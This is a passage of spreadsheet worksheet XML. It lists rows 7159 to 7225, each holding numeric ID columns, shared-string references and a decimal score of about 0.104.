        <v>0.1058700209643606</v>
      </c>
    </row>
    <row r="7159" ht="15.75" customHeight="1">
      <c r="A7159" s="1">
        <v>23527.0</v>
      </c>
      <c r="B7159" s="2">
        <v>5886637.0</v>
      </c>
      <c r="C7159" s="2" t="s">
        <v>6792</v>
      </c>
      <c r="D7159" s="2">
        <v>1.0</v>
      </c>
      <c r="E7159" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7159" s="2">
        <v>0.1058700209643606</v>
      </c>
    </row>
    <row r="7160" ht="15.75" customHeight="1">
      <c r="A7160" s="1">
        <v>23669.0</v>
      </c>
      <c r="B7160" s="2">
        <v>6894540.0</v>
      </c>
      <c r="C7160" s="2" t="s">
        <v>6256</v>
      </c>
      <c r="D7160" s="2">
        <v>1.0</v>
      </c>
      <c r="E7160" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7160" s="2">
        <v>0.1058700209643606</v>
      </c>
    </row>
    <row r="7161" ht="15.75" customHeight="1">
      <c r="A7161" s="1">
        <v>25123.0</v>
      </c>
      <c r="B7161" s="2">
        <v>1.2972286E7</v>
      </c>
      <c r="C7161" s="2" t="s">
        <v>6793</v>
      </c>
      <c r="D7161" s="2">
        <v>1.0</v>
      </c>
      <c r="E7161" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7161" s="2">
        <v>0.1058700209643606</v>
      </c>
    </row>
    <row r="7162" ht="15.75" customHeight="1">
      <c r="A7162" s="1">
        <v>31110.0</v>
      </c>
      <c r="B7162" s="2">
        <v>4.8682132E7</v>
      </c>
      <c r="C7162" s="2" t="s">
        <v>6794</v>
      </c>
      <c r="D7162" s="2">
        <v>1.0</v>
      </c>
      <c r="E7162" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7162" s="2">
        <v>0.1058700209643606</v>
      </c>
    </row>
    <row r="7163" ht="15.75" customHeight="1">
      <c r="A7163" s="1">
        <v>30932.0</v>
      </c>
      <c r="B7163" s="2">
        <v>4.7146839E7</v>
      </c>
      <c r="C7163" s="2" t="s">
        <v>6795</v>
      </c>
      <c r="D7163" s="2">
        <v>1.0</v>
      </c>
      <c r="E7163" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7163" s="2">
        <v>0.1057692307692307</v>
      </c>
    </row>
    <row r="7164" ht="15.75" customHeight="1">
      <c r="A7164" s="1">
        <v>16105.0</v>
      </c>
      <c r="B7164" s="2">
        <v>4.5399235E7</v>
      </c>
      <c r="C7164" s="2" t="s">
        <v>6796</v>
      </c>
      <c r="D7164" s="2">
        <v>1.0</v>
      </c>
      <c r="E7164" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7164" s="2">
        <v>0.1048387096774194</v>
      </c>
    </row>
    <row r="7165" ht="15.75" customHeight="1">
      <c r="A7165" s="1">
        <v>3701.0</v>
      </c>
      <c r="B7165" s="2">
        <v>3.9551741E7</v>
      </c>
      <c r="C7165" s="2" t="s">
        <v>6797</v>
      </c>
      <c r="D7165" s="2">
        <v>1.0</v>
      </c>
      <c r="E7165" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7165" s="2">
        <v>0.104735883424408</v>
      </c>
    </row>
    <row r="7166" ht="15.75" customHeight="1">
      <c r="A7166" s="1">
        <v>20157.0</v>
      </c>
      <c r="B7166" s="2">
        <v>1.0267495E7</v>
      </c>
      <c r="C7166" s="2" t="s">
        <v>6798</v>
      </c>
      <c r="D7166" s="2">
        <v>1.0</v>
      </c>
      <c r="E7166" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7166" s="2">
        <v>0.1046296296296296</v>
      </c>
    </row>
    <row r="7167" ht="15.75" customHeight="1">
      <c r="A7167" s="1">
        <v>25667.0</v>
      </c>
      <c r="B7167" s="2">
        <v>1.4524655E7</v>
      </c>
      <c r="C7167" s="2" t="s">
        <v>6799</v>
      </c>
      <c r="D7167" s="2">
        <v>1.0</v>
      </c>
      <c r="E7167" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7167" s="2">
        <v>0.1046296296296296</v>
      </c>
    </row>
    <row r="7168" ht="15.75" customHeight="1">
      <c r="A7168" s="1">
        <v>29480.0</v>
      </c>
      <c r="B7168" s="2">
        <v>3.2451645E7</v>
      </c>
      <c r="C7168" s="2" t="s">
        <v>6800</v>
      </c>
      <c r="D7168" s="2">
        <v>1.0</v>
      </c>
      <c r="E7168" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7168" s="2">
        <v>0.1046296296296296</v>
      </c>
    </row>
    <row r="7169" ht="15.75" customHeight="1">
      <c r="A7169" s="1">
        <v>12603.0</v>
      </c>
      <c r="B7169" s="2">
        <v>3.0083583E7</v>
      </c>
      <c r="C7169" s="2" t="s">
        <v>6801</v>
      </c>
      <c r="D7169" s="2">
        <v>1.0</v>
      </c>
      <c r="E7169" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7169" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="7170" ht="15.75" customHeight="1">
      <c r="A7170" s="1">
        <v>15492.0</v>
      </c>
      <c r="B7170" s="2">
        <v>4.3201075E7</v>
      </c>
      <c r="C7170" s="2" t="s">
        <v>6802</v>
      </c>
      <c r="D7170" s="2">
        <v>1.0</v>
      </c>
      <c r="E7170" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7170" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="7171" ht="15.75" customHeight="1">
      <c r="A7171" s="1">
        <v>16027.0</v>
      </c>
      <c r="B7171" s="2">
        <v>4.510024E7</v>
      </c>
      <c r="C7171" s="2" t="s">
        <v>6803</v>
      </c>
      <c r="D7171" s="2">
        <v>1.0</v>
      </c>
      <c r="E7171" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7171" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="7172" ht="15.75" customHeight="1">
      <c r="A7172" s="1">
        <v>17263.0</v>
      </c>
      <c r="B7172" s="2">
        <v>4.9148276E7</v>
      </c>
      <c r="C7172" s="2" t="s">
        <v>6804</v>
      </c>
      <c r="D7172" s="2">
        <v>1.0</v>
      </c>
      <c r="E7172" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7172" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="7173" ht="15.75" customHeight="1">
      <c r="A7173" s="1">
        <v>20135.0</v>
      </c>
      <c r="B7173" s="2">
        <v>1.0099847E7</v>
      </c>
      <c r="C7173" s="2" t="s">
        <v>6805</v>
      </c>
      <c r="D7173" s="2">
        <v>1.0</v>
      </c>
      <c r="E7173" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7173" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="7174" ht="15.75" customHeight="1">
      <c r="A7174" s="1">
        <v>20159.0</v>
      </c>
      <c r="B7174" s="2">
        <v>1.027601E7</v>
      </c>
      <c r="C7174" s="2" t="s">
        <v>6806</v>
      </c>
      <c r="D7174" s="2">
        <v>1.0</v>
      </c>
      <c r="E7174" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7174" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="7175" ht="15.75" customHeight="1">
      <c r="A7175" s="1">
        <v>21545.0</v>
      </c>
      <c r="B7175" s="2">
        <v>2.3550579E7</v>
      </c>
      <c r="C7175" s="2" t="s">
        <v>6807</v>
      </c>
      <c r="D7175" s="2">
        <v>1.0</v>
      </c>
      <c r="E7175" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7175" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="7176" ht="15.75" customHeight="1">
      <c r="A7176" s="1">
        <v>21600.0</v>
      </c>
      <c r="B7176" s="2">
        <v>2.4060542E7</v>
      </c>
      <c r="C7176" s="2" t="s">
        <v>6808</v>
      </c>
      <c r="D7176" s="2">
        <v>1.0</v>
      </c>
      <c r="E7176" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7176" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="7177" ht="15.75" customHeight="1">
      <c r="A7177" s="1">
        <v>22555.0</v>
      </c>
      <c r="B7177" s="2">
        <v>3.8297384E7</v>
      </c>
      <c r="C7177" s="2" t="s">
        <v>6809</v>
      </c>
      <c r="D7177" s="2">
        <v>1.0</v>
      </c>
      <c r="E7177" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7177" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="7178" ht="15.75" customHeight="1">
      <c r="A7178" s="1">
        <v>23047.0</v>
      </c>
      <c r="B7178" s="2">
        <v>5018558.0</v>
      </c>
      <c r="C7178" s="2" t="s">
        <v>6810</v>
      </c>
      <c r="D7178" s="2">
        <v>1.0</v>
      </c>
      <c r="E7178" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7178" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="7179" ht="15.75" customHeight="1">
      <c r="A7179" s="1">
        <v>23088.0</v>
      </c>
      <c r="B7179" s="2">
        <v>5.066871E7</v>
      </c>
      <c r="C7179" s="2" t="s">
        <v>6811</v>
      </c>
      <c r="D7179" s="2">
        <v>1.0</v>
      </c>
      <c r="E7179" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7179" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="7180" ht="15.75" customHeight="1">
      <c r="A7180" s="1">
        <v>23228.0</v>
      </c>
      <c r="B7180" s="2">
        <v>5285795.0</v>
      </c>
      <c r="C7180" s="2" t="s">
        <v>6812</v>
      </c>
      <c r="D7180" s="2">
        <v>1.0</v>
      </c>
      <c r="E7180" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7180" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="7181" ht="15.75" customHeight="1">
      <c r="A7181" s="1">
        <v>24189.0</v>
      </c>
      <c r="B7181" s="2">
        <v>1.0276009E7</v>
      </c>
      <c r="C7181" s="2" t="s">
        <v>6806</v>
      </c>
      <c r="D7181" s="2">
        <v>1.0</v>
      </c>
      <c r="E7181" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7181" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="7182" ht="15.75" customHeight="1">
      <c r="A7182" s="1">
        <v>24700.0</v>
      </c>
      <c r="B7182" s="2">
        <v>1.1644885E7</v>
      </c>
      <c r="C7182" s="2" t="s">
        <v>6813</v>
      </c>
      <c r="D7182" s="2">
        <v>1.0</v>
      </c>
      <c r="E7182" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7182" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="7183" ht="15.75" customHeight="1">
      <c r="A7183" s="1">
        <v>26528.0</v>
      </c>
      <c r="B7183" s="2">
        <v>1.7695439E7</v>
      </c>
      <c r="C7183" s="2" t="s">
        <v>6814</v>
      </c>
      <c r="D7183" s="2">
        <v>1.0</v>
      </c>
      <c r="E7183" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7183" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="7184" ht="15.75" customHeight="1">
      <c r="A7184" s="1">
        <v>26922.0</v>
      </c>
      <c r="B7184" s="2">
        <v>1.9410296E7</v>
      </c>
      <c r="C7184" s="2" t="s">
        <v>6815</v>
      </c>
      <c r="D7184" s="2">
        <v>1.0</v>
      </c>
      <c r="E7184" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7184" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="7185" ht="15.75" customHeight="1">
      <c r="A7185" s="1">
        <v>26940.0</v>
      </c>
      <c r="B7185" s="2">
        <v>1.9534604E7</v>
      </c>
      <c r="C7185" s="2" t="s">
        <v>6816</v>
      </c>
      <c r="D7185" s="2">
        <v>1.0</v>
      </c>
      <c r="E7185" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7185" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="7186" ht="15.75" customHeight="1">
      <c r="A7186" s="1">
        <v>28018.0</v>
      </c>
      <c r="B7186" s="2">
        <v>2.4373821E7</v>
      </c>
      <c r="C7186" s="2" t="s">
        <v>6817</v>
      </c>
      <c r="D7186" s="2">
        <v>1.0</v>
      </c>
      <c r="E7186" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7186" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="7187" ht="15.75" customHeight="1">
      <c r="A7187" s="1">
        <v>28763.0</v>
      </c>
      <c r="B7187" s="2">
        <v>2.8177591E7</v>
      </c>
      <c r="C7187" s="2" t="s">
        <v>6818</v>
      </c>
      <c r="D7187" s="2">
        <v>1.0</v>
      </c>
      <c r="E7187" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7187" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="7188" ht="15.75" customHeight="1">
      <c r="A7188" s="1">
        <v>29817.0</v>
      </c>
      <c r="B7188" s="2">
        <v>3.5214709E7</v>
      </c>
      <c r="C7188" s="2" t="s">
        <v>6819</v>
      </c>
      <c r="D7188" s="2">
        <v>1.0</v>
      </c>
      <c r="E7188" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7188" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="7189" ht="15.75" customHeight="1">
      <c r="A7189" s="1">
        <v>32984.0</v>
      </c>
      <c r="B7189" s="2">
        <v>6601666.0</v>
      </c>
      <c r="C7189" s="2" t="s">
        <v>6805</v>
      </c>
      <c r="D7189" s="2">
        <v>1.0</v>
      </c>
      <c r="E7189" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7189" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="7190" ht="15.75" customHeight="1">
      <c r="A7190" s="1">
        <v>33370.0</v>
      </c>
      <c r="B7190" s="2">
        <v>7632037.0</v>
      </c>
      <c r="C7190" s="2" t="s">
        <v>6820</v>
      </c>
      <c r="D7190" s="2">
        <v>1.0</v>
      </c>
      <c r="E7190" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7190" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="7191" ht="15.75" customHeight="1">
      <c r="A7191" s="1">
        <v>33800.0</v>
      </c>
      <c r="B7191" s="2">
        <v>8807508.0</v>
      </c>
      <c r="C7191" s="2" t="s">
        <v>6821</v>
      </c>
      <c r="D7191" s="2">
        <v>1.0</v>
      </c>
      <c r="E7191" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7191" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="7192" ht="15.75" customHeight="1">
      <c r="A7192" s="1">
        <v>1476.0</v>
      </c>
      <c r="B7192" s="2">
        <v>2.7110839E7</v>
      </c>
      <c r="C7192" s="2" t="s">
        <v>6822</v>
      </c>
      <c r="D7192" s="2">
        <v>1.0</v>
      </c>
      <c r="E7192" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7192" s="2">
        <v>0.1044061302681992</v>
      </c>
    </row>
    <row r="7193" ht="15.75" customHeight="1">
      <c r="A7193" s="1">
        <v>23052.0</v>
      </c>
      <c r="B7193" s="2">
        <v>5.0244576E7</v>
      </c>
      <c r="C7193" s="2" t="s">
        <v>6823</v>
      </c>
      <c r="D7193" s="2">
        <v>1.0</v>
      </c>
      <c r="E7193" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7193" s="2">
        <v>0.1044061302681992</v>
      </c>
    </row>
    <row r="7194" ht="15.75" customHeight="1">
      <c r="A7194" s="1">
        <v>31443.0</v>
      </c>
      <c r="B7194" s="2">
        <v>5.0244575E7</v>
      </c>
      <c r="C7194" s="2" t="s">
        <v>6823</v>
      </c>
      <c r="D7194" s="2">
        <v>1.0</v>
      </c>
      <c r="E7194" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7194" s="2">
        <v>0.1044061302681992</v>
      </c>
    </row>
    <row r="7195" ht="15.75" customHeight="1">
      <c r="A7195" s="1">
        <v>32658.0</v>
      </c>
      <c r="B7195" s="2">
        <v>5910981.0</v>
      </c>
      <c r="C7195" s="2" t="s">
        <v>6824</v>
      </c>
      <c r="D7195" s="2">
        <v>1.0</v>
      </c>
      <c r="E7195" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7195" s="2">
        <v>0.1044061302681992</v>
      </c>
    </row>
    <row r="7196" ht="15.75" customHeight="1">
      <c r="A7196" s="1">
        <v>145.0</v>
      </c>
      <c r="B7196" s="2">
        <v>1.358764E7</v>
      </c>
      <c r="C7196" s="2" t="s">
        <v>6825</v>
      </c>
      <c r="D7196" s="2">
        <v>1.0</v>
      </c>
      <c r="E7196" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7196" s="2">
        <v>0.1042884990253411</v>
      </c>
    </row>
    <row r="7197" ht="15.75" customHeight="1">
      <c r="A7197" s="1">
        <v>2707.0</v>
      </c>
      <c r="B7197" s="2">
        <v>3.4877025E7</v>
      </c>
      <c r="C7197" s="2" t="s">
        <v>6826</v>
      </c>
      <c r="D7197" s="2">
        <v>1.0</v>
      </c>
      <c r="E7197" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7197" s="2">
        <v>0.1042884990253411</v>
      </c>
    </row>
    <row r="7198" ht="15.75" customHeight="1">
      <c r="A7198" s="1">
        <v>8855.0</v>
      </c>
      <c r="B7198" s="2">
        <v>5.4728193E7</v>
      </c>
      <c r="C7198" s="2" t="s">
        <v>6653</v>
      </c>
      <c r="D7198" s="2">
        <v>1.0</v>
      </c>
      <c r="E7198" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7198" s="2">
        <v>0.1042884990253411</v>
      </c>
    </row>
    <row r="7199" ht="15.75" customHeight="1">
      <c r="A7199" s="1">
        <v>23711.0</v>
      </c>
      <c r="B7199" s="2">
        <v>7177714.0</v>
      </c>
      <c r="C7199" s="2" t="s">
        <v>6827</v>
      </c>
      <c r="D7199" s="2">
        <v>1.0</v>
      </c>
      <c r="E7199" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7199" s="2">
        <v>0.1042884990253411</v>
      </c>
    </row>
    <row r="7200" ht="15.75" customHeight="1">
      <c r="A7200" s="1">
        <v>1104.0</v>
      </c>
      <c r="B7200" s="2">
        <v>2.3990883E7</v>
      </c>
      <c r="C7200" s="2" t="s">
        <v>6828</v>
      </c>
      <c r="D7200" s="2">
        <v>1.0</v>
      </c>
      <c r="E7200" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7200" s="2">
        <v>0.1041666666666667</v>
      </c>
    </row>
    <row r="7201" ht="15.75" customHeight="1">
      <c r="A7201" s="1">
        <v>17528.0</v>
      </c>
      <c r="B7201" s="2">
        <v>5.0100155E7</v>
      </c>
      <c r="C7201" s="2" t="s">
        <v>6829</v>
      </c>
      <c r="D7201" s="2">
        <v>1.0</v>
      </c>
      <c r="E7201" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7201" s="2">
        <v>0.1041666666666667</v>
      </c>
    </row>
    <row r="7202" ht="15.75" customHeight="1">
      <c r="A7202" s="1">
        <v>22803.0</v>
      </c>
      <c r="B7202" s="2">
        <v>4.5776167E7</v>
      </c>
      <c r="C7202" s="2" t="s">
        <v>6830</v>
      </c>
      <c r="D7202" s="2">
        <v>1.0</v>
      </c>
      <c r="E7202" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7202" s="2">
        <v>0.1041666666666667</v>
      </c>
    </row>
    <row r="7203" ht="15.75" customHeight="1">
      <c r="A7203" s="1">
        <v>24714.0</v>
      </c>
      <c r="B7203" s="2">
        <v>1.1696858E7</v>
      </c>
      <c r="C7203" s="2" t="s">
        <v>6831</v>
      </c>
      <c r="D7203" s="2">
        <v>1.0</v>
      </c>
      <c r="E7203" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7203" s="2">
        <v>0.1041666666666667</v>
      </c>
    </row>
    <row r="7204" ht="15.75" customHeight="1">
      <c r="A7204" s="1">
        <v>26851.0</v>
      </c>
      <c r="B7204" s="2">
        <v>1.9013433E7</v>
      </c>
      <c r="C7204" s="2" t="s">
        <v>6832</v>
      </c>
      <c r="D7204" s="2">
        <v>1.0</v>
      </c>
      <c r="E7204" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7204" s="2">
        <v>0.1041666666666667</v>
      </c>
    </row>
    <row r="7205" ht="15.75" customHeight="1">
      <c r="A7205" s="1">
        <v>33570.0</v>
      </c>
      <c r="B7205" s="2">
        <v>8232150.0</v>
      </c>
      <c r="C7205" s="2" t="s">
        <v>6833</v>
      </c>
      <c r="D7205" s="2">
        <v>1.0</v>
      </c>
      <c r="E7205" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7205" s="2">
        <v>0.1041666666666667</v>
      </c>
    </row>
    <row r="7206" ht="15.75" customHeight="1">
      <c r="A7206" s="1">
        <v>33712.0</v>
      </c>
      <c r="B7206" s="2">
        <v>8498713.0</v>
      </c>
      <c r="C7206" s="2" t="s">
        <v>6834</v>
      </c>
      <c r="D7206" s="2">
        <v>1.0</v>
      </c>
      <c r="E7206" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7206" s="2">
        <v>0.1041666666666667</v>
      </c>
    </row>
    <row r="7207" ht="15.75" customHeight="1">
      <c r="A7207" s="1">
        <v>21034.0</v>
      </c>
      <c r="B7207" s="2">
        <v>1.7554173E7</v>
      </c>
      <c r="C7207" s="2" t="s">
        <v>6835</v>
      </c>
      <c r="D7207" s="2">
        <v>1.0</v>
      </c>
      <c r="E7207" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7207" s="2">
        <v>0.1041666666666666</v>
      </c>
    </row>
    <row r="7208" ht="15.75" customHeight="1">
      <c r="A7208" s="1">
        <v>26493.0</v>
      </c>
      <c r="B7208" s="2">
        <v>1.7519177E7</v>
      </c>
      <c r="C7208" s="2" t="s">
        <v>6836</v>
      </c>
      <c r="D7208" s="2">
        <v>1.0</v>
      </c>
      <c r="E7208" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7208" s="2">
        <v>0.1041666666666666</v>
      </c>
    </row>
    <row r="7209" ht="15.75" customHeight="1">
      <c r="A7209" s="1">
        <v>17125.0</v>
      </c>
      <c r="B7209" s="2">
        <v>4.8815266E7</v>
      </c>
      <c r="C7209" s="2" t="s">
        <v>6837</v>
      </c>
      <c r="D7209" s="2">
        <v>1.0</v>
      </c>
      <c r="E7209" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7209" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="7210" ht="15.75" customHeight="1">
      <c r="A7210" s="1">
        <v>18150.0</v>
      </c>
      <c r="B7210" s="2">
        <v>5.1862084E7</v>
      </c>
      <c r="C7210" s="2" t="s">
        <v>6838</v>
      </c>
      <c r="D7210" s="2">
        <v>1.0</v>
      </c>
      <c r="E7210" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7210" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="7211" ht="15.75" customHeight="1">
      <c r="A7211" s="1">
        <v>23260.0</v>
      </c>
      <c r="B7211" s="2">
        <v>5.3178321E7</v>
      </c>
      <c r="C7211" s="2" t="s">
        <v>6839</v>
      </c>
      <c r="D7211" s="2">
        <v>1.0</v>
      </c>
      <c r="E7211" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7211" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="7212" ht="15.75" customHeight="1">
      <c r="A7212" s="1">
        <v>25125.0</v>
      </c>
      <c r="B7212" s="2">
        <v>1.2972286E7</v>
      </c>
      <c r="C7212" s="2" t="s">
        <v>6840</v>
      </c>
      <c r="D7212" s="2">
        <v>1.0</v>
      </c>
      <c r="E7212" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7212" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="7213" ht="15.75" customHeight="1">
      <c r="A7213" s="1">
        <v>25764.0</v>
      </c>
      <c r="B7213" s="2">
        <v>1.4629301E7</v>
      </c>
      <c r="C7213" s="2" t="s">
        <v>6841</v>
      </c>
      <c r="D7213" s="2">
        <v>1.0</v>
      </c>
      <c r="E7213" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7213" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="7214" ht="15.75" customHeight="1">
      <c r="A7214" s="1">
        <v>27248.0</v>
      </c>
      <c r="B7214" s="2">
        <v>2.1061788E7</v>
      </c>
      <c r="C7214" s="2" t="s">
        <v>6842</v>
      </c>
      <c r="D7214" s="2">
        <v>1.0</v>
      </c>
      <c r="E7214" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7214" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="7215" ht="15.75" customHeight="1">
      <c r="A7215" s="1">
        <v>6858.0</v>
      </c>
      <c r="B7215" s="2">
        <v>4.9673709E7</v>
      </c>
      <c r="C7215" s="2" t="s">
        <v>6843</v>
      </c>
      <c r="D7215" s="2">
        <v>1.0</v>
      </c>
      <c r="E7215" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7215" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="7216" ht="15.75" customHeight="1">
      <c r="A7216" s="1">
        <v>15534.0</v>
      </c>
      <c r="B7216" s="2">
        <v>4.3317754E7</v>
      </c>
      <c r="C7216" s="2" t="s">
        <v>6844</v>
      </c>
      <c r="D7216" s="2">
        <v>1.0</v>
      </c>
      <c r="E7216" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7216" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="7217" ht="15.75" customHeight="1">
      <c r="A7217" s="1">
        <v>18547.0</v>
      </c>
      <c r="B7217" s="2">
        <v>5.3124668E7</v>
      </c>
      <c r="C7217" s="2" t="s">
        <v>6845</v>
      </c>
      <c r="D7217" s="2">
        <v>1.0</v>
      </c>
      <c r="E7217" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7217" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="7218" ht="15.75" customHeight="1">
      <c r="A7218" s="1">
        <v>20363.0</v>
      </c>
      <c r="B7218" s="2">
        <v>1.1750611E7</v>
      </c>
      <c r="C7218" s="2" t="s">
        <v>6846</v>
      </c>
      <c r="D7218" s="2">
        <v>1.0</v>
      </c>
      <c r="E7218" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7218" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="7219" ht="15.75" customHeight="1">
      <c r="A7219" s="1">
        <v>21560.0</v>
      </c>
      <c r="B7219" s="2">
        <v>2.3676885E7</v>
      </c>
      <c r="C7219" s="2" t="s">
        <v>6847</v>
      </c>
      <c r="D7219" s="2">
        <v>1.0</v>
      </c>
      <c r="E7219" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7219" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="7220" ht="15.75" customHeight="1">
      <c r="A7220" s="1">
        <v>21626.0</v>
      </c>
      <c r="B7220" s="2">
        <v>2.4635432E7</v>
      </c>
      <c r="C7220" s="2" t="s">
        <v>6729</v>
      </c>
      <c r="D7220" s="2">
        <v>1.0</v>
      </c>
      <c r="E7220" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7220" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="7221" ht="15.75" customHeight="1">
      <c r="A7221" s="1">
        <v>27769.0</v>
      </c>
      <c r="B7221" s="2">
        <v>2.3112926E7</v>
      </c>
      <c r="C7221" s="2" t="s">
        <v>6848</v>
      </c>
      <c r="D7221" s="2">
        <v>1.0</v>
      </c>
      <c r="E7221" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7221" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="7222" ht="15.75" customHeight="1">
      <c r="A7222" s="1">
        <v>28403.0</v>
      </c>
      <c r="B7222" s="2">
        <v>2.6283067E7</v>
      </c>
      <c r="C7222" s="2" t="s">
        <v>6849</v>
      </c>
      <c r="D7222" s="2">
        <v>1.0</v>
      </c>
      <c r="E7222" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7222" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="7223" ht="15.75" customHeight="1">
      <c r="A7223" s="1">
        <v>29024.0</v>
      </c>
      <c r="B7223" s="2">
        <v>3.0100945E7</v>
      </c>
      <c r="C7223" s="2" t="s">
        <v>6850</v>
      </c>
      <c r="D7223" s="2">
        <v>1.0</v>
      </c>
      <c r="E7223" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7223" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="7224" ht="15.75" customHeight="1">
      <c r="A7224" s="1">
        <v>2731.0</v>
      </c>
      <c r="B7224" s="2">
        <v>3.4987995E7</v>
      </c>
      <c r="C7224" s="2" t="s">
        <v>6851</v>
      </c>
      <c r="D7224" s="2">
        <v>1.0</v>
      </c>
      <c r="E7224" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7224" s="2">
        <v>0.1037735849056604</v>
      </c>
    </row>
    <row r="7225" ht="15.75" customHeight="1">
      <c r="A7225" s="1">
        <v>3811.0</v>
      </c>
      <c r="B7225" s="2">
        <v>4.0064337E7</v>
      </c>
      <c r="C7225" s="2" t="s">
        <v>6852</v>
      </c>
      <c r="D7225" s="2">
        <v>1.0</v>
      </c>
      <c r="E7225" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7225" s="2">
        <v>0.1037735849056604</v>
      </c>
    </row>
